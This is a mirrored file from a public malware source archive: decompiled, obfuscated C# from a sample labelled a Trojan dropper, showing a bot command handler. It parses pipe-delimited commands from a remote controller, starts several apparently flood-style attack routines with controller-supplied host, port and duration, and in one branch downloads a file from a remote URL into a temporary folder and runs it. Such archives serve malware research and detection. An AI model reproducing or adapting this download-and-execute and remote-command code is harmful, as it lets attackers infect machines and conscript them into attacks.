mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 03:46:10 +00:00
243 lines
6.4 KiB
C#
243 lines
6.4 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: .
|
|||
|
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
|
|||
|
|
|||
|
using \u0001;
|
|||
|
using \u0008;
|
|||
|
using \u000E;
|
|||
|
using System;
|
|||
|
using System.Collections.Generic;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Net;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
|
|||
|
namespace \u000E
|
|||
|
{
|
|||
|
internal class \u0003
|
|||
|
{
|
|||
|
[NonSerialized]
|
|||
|
internal static \u0002 \u0001;
|
|||
|
private static \u000E.\u0008 \u0001;
|
|||
|
|
|||
|
public void \u000F([In] string obj0)
|
|||
|
{
|
|||
|
string[] strArray = new string[0];
|
|||
|
WebClient webClient = new WebClient();
|
|||
|
try
|
|||
|
{
|
|||
|
strArray = obj0.Split('|');
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
string key;
|
|||
|
if ((key = strArray[0]) == null)
|
|||
|
return;
|
|||
|
// ISSUE: reference to a compiler-generated field
|
|||
|
if (\u0010.\u0001.\u0001 == null)
|
|||
|
{
|
|||
|
// ISSUE: reference to a compiler-generated field
|
|||
|
\u0010.\u0001.\u0001 = new Dictionary<string, int>(10)
|
|||
|
{
|
|||
|
{
|
|||
|
\u0003.\u0001(3059),
|
|||
|
0
|
|||
|
},
|
|||
|
{
|
|||
|
\u0003.\u0001(3080),
|
|||
|
1
|
|||
|
},
|
|||
|
{
|
|||
|
\u0003.\u0001(3101),
|
|||
|
2
|
|||
|
},
|
|||
|
{
|
|||
|
\u0003.\u0001(3122),
|
|||
|
3
|
|||
|
},
|
|||
|
{
|
|||
|
\u0003.\u0001(3143),
|
|||
|
4
|
|||
|
},
|
|||
|
{
|
|||
|
\u0003.\u0001(3152),
|
|||
|
5
|
|||
|
},
|
|||
|
{
|
|||
|
\u0003.\u0001(3161),
|
|||
|
6
|
|||
|
},
|
|||
|
{
|
|||
|
\u0003.\u0001(3170),
|
|||
|
7
|
|||
|
},
|
|||
|
{
|
|||
|
\u0003.\u0001(3179),
|
|||
|
8
|
|||
|
},
|
|||
|
{
|
|||
|
\u0003.\u0001(3188),
|
|||
|
9
|
|||
|
}
|
|||
|
};
|
|||
|
}
|
|||
|
int num;
|
|||
|
// ISSUE: reference to a compiler-generated field
|
|||
|
// ISSUE: explicit non-virtual call
|
|||
|
if (!__nonvirtual (\u0010.\u0001.\u0001.TryGetValue(key, out num)))
|
|||
|
return;
|
|||
|
switch (num)
|
|||
|
{
|
|||
|
case 0:
|
|||
|
try
|
|||
|
{
|
|||
|
\u0007.\u0008.\u0010();
|
|||
|
break;
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
\u0003.\u0001.\u0010(ex.ToString());
|
|||
|
break;
|
|||
|
}
|
|||
|
case 1:
|
|||
|
try
|
|||
|
{
|
|||
|
\u0002.\u0010();
|
|||
|
break;
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
\u0003.\u0001.\u0010(ex.ToString());
|
|||
|
break;
|
|||
|
}
|
|||
|
case 2:
|
|||
|
try
|
|||
|
{
|
|||
|
\u000F.\u0007.\u0010();
|
|||
|
break;
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
\u0003.\u0001.\u0010(ex.ToString());
|
|||
|
break;
|
|||
|
}
|
|||
|
case 3:
|
|||
|
try
|
|||
|
{
|
|||
|
\u0003.\u0010();
|
|||
|
break;
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
\u0003.\u0001.\u0010(ex.ToString());
|
|||
|
break;
|
|||
|
}
|
|||
|
case 4:
|
|||
|
try
|
|||
|
{
|
|||
|
if (\u0007.\u0008.\u0001)
|
|||
|
break;
|
|||
|
\u0007.\u0008.\u0001 = Convert.ToString(strArray[1]);
|
|||
|
\u0007.\u0008.\u0001 = ushort.Parse(strArray[2]);
|
|||
|
\u0007.\u0008.\u0002 = Convert.ToInt32(strArray[3]);
|
|||
|
\u0007.\u0008.\u0001 = Convert.ToInt32(strArray[4]);
|
|||
|
\u0007.\u0008.\u000F();
|
|||
|
break;
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
\u0003.\u0001.\u0010(ex.ToString());
|
|||
|
break;
|
|||
|
}
|
|||
|
case 5:
|
|||
|
try
|
|||
|
{
|
|||
|
if (\u0002.\u0001)
|
|||
|
break;
|
|||
|
\u0002.\u0001 = Convert.ToString(strArray[1]);
|
|||
|
\u0002.\u0002 = Convert.ToInt32(strArray[2]);
|
|||
|
\u0002.\u0001 = Convert.ToInt32(strArray[2]);
|
|||
|
\u0002.\u000F();
|
|||
|
break;
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
\u0003.\u0001.\u0010(ex.ToString());
|
|||
|
break;
|
|||
|
}
|
|||
|
case 6:
|
|||
|
try
|
|||
|
{
|
|||
|
if (\u000F.\u0007.\u0001)
|
|||
|
break;
|
|||
|
\u000F.\u0007.\u0001 = Convert.ToString(strArray[1]);
|
|||
|
\u000F.\u0007.\u0001 = ushort.Parse(strArray[2]);
|
|||
|
\u000F.\u0007.\u0002 = Convert.ToInt32(strArray[3]);
|
|||
|
\u000F.\u0007.\u0003 = Convert.ToInt32(strArray[4]);
|
|||
|
\u000F.\u0007.\u0001 = 500;
|
|||
|
\u000F.\u0007.\u000F();
|
|||
|
break;
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
\u0003.\u0001.\u0010(ex.ToString());
|
|||
|
break;
|
|||
|
}
|
|||
|
case 7:
|
|||
|
try
|
|||
|
{
|
|||
|
if (\u0003.\u0001)
|
|||
|
break;
|
|||
|
\u0003.\u0001 = Convert.ToString(strArray[1]);
|
|||
|
\u0003.\u0003 = Convert.ToInt32(strArray[3]);
|
|||
|
\u0003.\u0001 = Convert.ToInt32(strArray[4]);
|
|||
|
\u0003.\u0002 = 500;
|
|||
|
\u0003.\u000F();
|
|||
|
break;
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
\u0003.\u0001.\u0010(ex.ToString());
|
|||
|
break;
|
|||
|
}
|
|||
|
case 8:
|
|||
|
try
|
|||
|
{
|
|||
|
if (strArray[3] == \u0003.\u0001(3201))
|
|||
|
{
|
|||
|
string str = Convert.ToString(strArray[1]);
|
|||
|
if (!str.StartsWith(\u0003.\u0001(3046)))
|
|||
|
str = \u0003.\u0001(3046) + str;
|
|||
|
\u000F.\u0001.\u0001.\u000F(str);
|
|||
|
break;
|
|||
|
}
|
|||
|
string str1 = \u000F.\u0001.\u0001.\u000F(new Random().Next(5, 12)) + \u0003.\u0001(3206);
|
|||
|
string address = Convert.ToString(strArray[1]);
|
|||
|
if (!address.StartsWith(\u0003.\u0001(3046)))
|
|||
|
address = \u0003.\u0001(3046) + address;
|
|||
|
webClient.DownloadFile(address, Environment.GetEnvironmentVariable(\u0003.\u0001(3215)) + \u0003.\u0001(1967) + str1);
|
|||
|
Process process = new Process();
|
|||
|
process.StartInfo.FileName = Environment.GetEnvironmentVariable(\u0003.\u0001(3215)) + \u0003.\u0001(1967) + str1;
|
|||
|
if (strArray[2].ToString() != \u0003.\u0001(994))
|
|||
|
process.StartInfo.Arguments = strArray[2].ToString();
|
|||
|
process.Start();
|
|||
|
break;
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
\u0003.\u0001.\u0010(ex.ToString());
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
static \u0003()
|
|||
|
{
|
|||
|
\u0003.\u000F();
|
|||
|
\u0003.\u0001 = new \u000E.\u0008();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|